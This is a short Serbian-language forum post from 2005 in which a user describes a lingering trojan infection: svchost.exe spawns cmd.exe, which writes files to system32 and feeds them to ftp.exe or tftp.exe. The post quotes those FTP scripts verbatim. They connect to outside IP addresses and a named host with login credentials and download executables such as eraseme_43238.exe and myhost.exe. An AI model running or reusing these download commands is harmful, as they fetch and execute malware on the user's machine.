[ zloboleon @ 28.12.2005. 21:59 ] @
evo jedno pitanjce naime koristim processguard da bih se zastitio od ovih hardcore trojana ali pored nekih ispitivanje izgleda da je ostao neki njihov deo kad se konektujem na net svchost.exe pokrece cmd.exe sa nekim komandama i stvara file imena i ili qaz u system32 i otvara ftp.exe ili tftp.exe ucitavajuci komandame iz ovih file-ova. sadrzaj file i je promenlji ali uglavno je slican ovome open 195.252.84.90 19736 user 1 1 get eraseme_43238.exe quit ili open 195.252.126.254 1331 user 1 1 get eraseme_53107.exe quit >file qaz open xman.acid-burn.info 21 user ftplogx ftpP4ssX binary get myhost.exe bye ako neko ima neko objasnjenje neka kaze! bice imagea poz |